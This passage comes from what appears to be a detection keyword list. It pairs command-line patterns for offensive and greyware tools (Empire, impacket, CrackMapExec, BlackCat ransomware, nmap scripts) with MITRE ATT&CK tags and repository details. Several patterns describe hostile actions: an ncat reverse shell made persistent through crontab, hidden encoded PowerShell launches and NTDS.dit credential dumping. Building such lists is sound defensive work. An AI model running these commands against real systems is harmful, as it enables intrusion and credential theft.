- TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -NBNSBruteForce*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"* nbns-interfaces.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -NBNSTTL *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* nbstat.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ncat * -e /bin/bash*|crontab*","greyware_tool_keyword","ncat","reverse shell persistence","T1059.004 - T1053.005 - T1059.005","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"* ncp-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ncp-serverinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ndmp-fs-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ndmp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --neo4j-host *--neo4j-port*","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","0","N/A","N/A","2","136","12","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" +"* nessus-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* nessus-xmlrpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* netbus-auth-bypass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* netbus-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* netbus-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* netbus-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --netcat-port *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"* netripper*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* netscan.exe *","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"* --NewCertPath *.pfx --NewCertPassword *","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","0","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" +"* NewLocalAdmin(*","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" +"* nexpose-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* nfs-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* nfs-showmount.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* nfs-statfs.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --nicehash *--coin *","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"* nikto.pl *","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" +"* nimcrypt*","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","0","N/A","N/A","1","83","5","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z" +"* Ninja.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"* nje-node-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* nje-pass-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --nla-redirection-host * --nla-redirection-port *","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" +"* nntp-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -NoBase64 *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1061","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --no-bruteforce *","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --no-bruteforce --continue-on-success*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* --no-http-server -smb2support -t * -c *","offensive_tool_keyword","AD exploitation cheat sheet","Example command to relay the hash to authenticate as local admin (if the service account has these privileges) and run calc.exe. Omit the -c parameter to attempt a secretsdump instead.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --nomain -d:exportDll --passL:*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"* --no-net*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -NoP -sta -NonI -W Hidden -Enc *","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"* -no-pass -dns-tcp -nameserver*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"* -no-pass -just-dc-user *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -no-pass rid-hijack*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"* -no-pass -usersfile *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* NoPowerShell.*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"* No-PowerShell.cs*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"* --no-ppid-spoof*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"* -no-preauth * -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -NoPRo -wIN 1 -nONi -eN Sh33L*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"* --no-prop*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --no-prop-servers*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --no-sigthief*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"* --no-vm-kill*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --no-vm-snapshot-kill*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --no-wall*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* nping-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* nrpe-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* NtCr3at3Thr3adEx @ *","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" +"* -ntds *.dit *-system *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -ntds NTDS.dit -filters*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"* -ntds NTDS.dit -system SYSTEM -outputdir /*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"* 